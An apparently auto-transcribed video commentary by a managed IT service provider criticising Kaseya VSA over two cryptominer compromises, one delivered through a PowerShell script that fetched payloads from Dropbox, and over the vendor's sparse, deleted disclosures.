 So if you've seen the last episode of log Thursday, you knew I started out being a little bit upset And this is what I wanted to rant about so now that I'm done recording the vlog I'm recording this real quick. So this is hopefully the next video. Anyways, let's jump into this here the Kaseya it RMM software for MSPs now Give you a quick overview if you're not familiar with this What MSP is is managers providing and it's something we do with our clients. So we are an MSP We means we manage and are the outside IT for a company so they pay us a fee we then Monitor actively their IT now that means we need tools and those tools of those few choices out there Are you full disclosure right now in 2018 and for the last several years? We have been a solar winds customer We have used a solar winds product. So I'm not Bashing on this company specifically I'm calling out some security vulnerabilities So it's not that I'm I don't like them because I don't use them or anything like that I want people to really think about this and really Take time because too much too much This is the part that makes me mad of IT people I meet are driven by price. They're like Tom I can't make enough money at that I can't make enough money at this they look at software going well The margins not good enough. I'm like I start with when I'm deciding on software Security utmost always first and foremost. Is this a secure product? I'm using great I do care if I make a few dollars because we all stay in business. I'm a business owner It's important. You got to make money. I think so that is a concern. So it's security It's features and price those are factors security though is not a factor It's an imperative if it's not secure. I'm not using it if it's maybe secure I'm not using it. That is a huge thing to me now This is also really really hard to figure out whether or not something secure But we're gonna talk about the flaw that happened here because this is very scary to me And I don't know why it's not bigger news But if I'm in the IT service business, this should be huge news because it's a popular piece of software So this is their Kaseya VSA next-gen remote monitoring tool management software And this is the same thing we similar to what we go solar winds likes a competing products here You get these cool dashboards and they show me whether or not you got your patches loaded and everything else And this is also how you scale up your company. We use automation software So we manage, you know hundreds of computers and clients and all this stuff from dashboards That let us see everything in mass, but that comes with a little bit of a risk Obviously if this tool has remote patch management remote control network performance Antivirus Santa Maria and cloud backup and those integration levels are at the server and desktop That means this program whatever program you choose for your IT automation has a lot of power over those servers So this is why security is important. You want the company to be very very secure That being said, let's talk about what actually happened here and then some of my aggravations with this so The the few people broke the news here and this is I'll leave of course as always all the links below So Kaseya virtual system administrator has been compromised now. This is what's going on This is a the way it was found and let's break down this is from a security operations center and East entire It's what these folks are managed detection hackers never take a break neither do we you know I'm not super familiar with the company But what they are is whether you call them a sock which their security operations center and they look for anomalies in some of the Outgoing traffic and manage your firewalls. That's an important thing that being said Watching IPs in your computers from a network connecting to weird IPs is a reactionary process by the way and this is what they found and There was a PowerShell script and this was launched via the Kaseya system It then downloaded now. This is this is where things get a little bit tricky You have different protections that block websites from coming in like a UTM or Universal threat management, which is your firewall system. I'm sorry unified threat management Anyways, the concept is the firewall does blocking of sites once again Reactive process, so you hope the sites are blocked and now how did this get through not real clear I would love if they gave a more clear debrief for gonna get in a second But the short of it is the reason the script was able to get through is it's simply a PowerShell script and The PowerShell script was downloading from Dropbox We know that from Hunter slabs over here PowerShell payload for Kaseya VSA Monero mailware Changes Russia keys and added their new storage release blah blah blah and in short though and they break it down in here I think at the bottom that it was downloaded From a Dropbox account so because Dropbox isn't on the blacklist It automatically had a no problem Downloading knows because you well you don't blacklist Dropbox because most businesses use it or have to have access to it So this is how it got through and so all that fun blocking stuff that UTMs Do did nothing because you can't block Dropbox or you'd have a different business problem Here's the payloads it downloaded the real question is How this happened at Kaseya? How did this tool that was used to control all these systems get compromised and now they have a patch for this is This is tragic. This is terrible. This would be a big disaster This is what worries me about so many of these programs is how good is the security? We have to blindly trust some of them They're not open source or not giving us any look at how they actually manage things inside their company But you can develop ideas and patterns from companies and the reason I say that now It's funny because please note. This is a cached Google page of this. I'll leave this link in here as well Action-required KSA VSA product availability like coin mining malware, and you're probably thinking wait a minute time You just showed me Monero Money. Yeah. Yeah, this is a year ago one year ago same problem and the reason we're gonna cash one They deleted this off their website, and I don't know why but once you've put it on the internet It's on the internet. Thank you for Google web cache and things like way back by machine So and I love look at the phrasing here while the mayor where I have allowed unknown attacker to access Endpoint systems that may contain sensitive data elements We have seen nothing to suggest as malware was harvesting personal financial or any other kind of sense information Or any individuals information has been misused as a result of the attack And of course, this is the actual page link not found they deleted it I guess because it looks bad when you use the same phrasing in here in January of 2018 We have seen no evidence to suggest that this vulnerability was used to harvest personal financial or other sensitive information However, we are aware small subset of our partners where Monero cryptocurrency cryptocurrency mining software is deployed to the endpoints The fact that they were able to deploy this that raises Massive alarms not because it happened one security is really really hard Because with security you have to be right every day 24-7 all the time with the hackers They only gotta be right once they just keep plugging away and what people found the hole and they get in But the fact that this company two times two different crypto currencies being mined Compromising customers that is a massive for a company that specifically is for patching and securing systems That is a massive breach of trust between the clients. So that's Huge to me and it makes me worry constantly because I see so many people that love these outsourced automation tools that are things like for all your documentation We'll just put it all in the cloud and we'll keep it secure And it has full access to every one of your clients and everything in there And this is why I try as much as I can to have solutions that are transparent And I don't mind paying extra money because the security thing is huge and I'm not making any libel claims against them I'm reading off their own website and their patches on here and this is quite scary to me I feel as though they're downplaying it because within grantee. Yeah, we don't see any evidence that financial someone got in there and turned your systems into a Mining for crypto mining that is a massive problem That is what if they would have done something worse? What if they did other things and we don't know it because we didn't see it because they just didn't do anything that was suspicious What if they downloaded from Dropbox and re-uploaded from a target? You know a financial list or anything else don't see it. Well, how would you see it? We only know what we found we don't know we don't found but we know if there was a hole that allowed someone to do this We would love it and I would love a full debrief So if someone from Kaseya wants to reach out to me and and well, there's here to guys and give a debrief That'd be awesome. I'd love them to publish it. I really wanted to be public I don't mind interviewing off video, but I'd like it to see public as we really want to know do to gather trust I mean with security mistakes happen. I just covered one on Grammar leave it today. They fixed it They admitted to it. They pwned up to it We made a mistake someone found it and I'm hoping and I'm trying to reach out to some of the security researchers I know because there's so many of these different tools like this out there solar winds Kaseya Connect wise and but this is big I don't know of any vulnerabilities that were discovered found and that this happened to it the other ones if you have links to I'd be more than happy to read into it, but it's just Kaseya one popped up I've seen a couple people post about it It doesn't seem to be getting an attraction, but it still scares me and I want more security researchers Hopefully you're raising an interest because this is really popular in my industry as the it Industry we're all using some type of tool like this and we want these tools to improve and not be We creating the risk that we're trying to prevent from the clients because that's where this really gets scary and it bothers me a lot though That I cannot find anything other than the cached Google version of that page So there's the page if you see the right here the dash da da da Page not found so when you yeah Google's cash copy you click on it It just redirect and you could see page not found so why'd they take it down? Is it because it's embarrassing? I mean really is if you fail leave it up there could disclose You know that it happened we move on we build trust we talked about how it's not gonna happen again. We debrief on it Did page not found is I don't think acceptable. That's my opinion on that and But yeah, this is definitely concerning that twice. They were hit with miners too two different miners But still the same concept and of course they went through all the security because they use Dropbox So the hackers they evolved they you know that there's this so here's this and the fact that this was reactionary not proactive Also, very scary. So let me know your thoughts on this. I'm really curious And if you know of any of the other major R&M fighters are in this market that have Had this type of thing. I didn't I'm just not aware of any but like it appears to have happened twice now to these people That's just that's really scary to me So just think about that when you're out there looking at products if your job is protecting your clients What's your plan be if this happens? How do you save the embarrassment it did any of you tell and share with your clients if you found it? And all you do is remove a Bitcoin matter. Do you disclose them? You're probably in violation if you didn't This has becomes a moral and ethical hacking question if a client's compromised and are a financial service provider should they follow their own Procedures for compliance and then let people know that there's a chance that someone because they unauthorized app on there This is dealt with in hospitals All the time even if they didn't necessarily get the client data that you can prove But they were in the system that had all the client data. You now have to do some disclosure There's laws regarding this so this is just some thought provoking I hope and and some real concerns I have with this and this is what had me upset about This morning, I'm like this is crazy that it happened twice in this company They deleted the page and too many of these companies and I'm not gonna call out any IT people I know but in some of the peer groups I belong to so many of these people seem overly focused on price And you're doing a disservice to the community because people trust you as an IT person and you're like well if I switch providers I can make 10 more percent or 20 more percent Yeah, but are you thinking about the security of that company if they're half the price of the competitors because the competitor is greedy and just charges too much for the product or they're going hey Good security guys cost a lot of money and that was you know, that's our payroll This is also goes back to transparency and companies. Please just close more to us So we have a better understanding of what's going on and key Kaseya. Please debrief us on this We want to we love to know all the details. That's how you build trust back in the community So thanks for watching if you like to count in here like and subscribe and let me know your thoughts on this I'm curious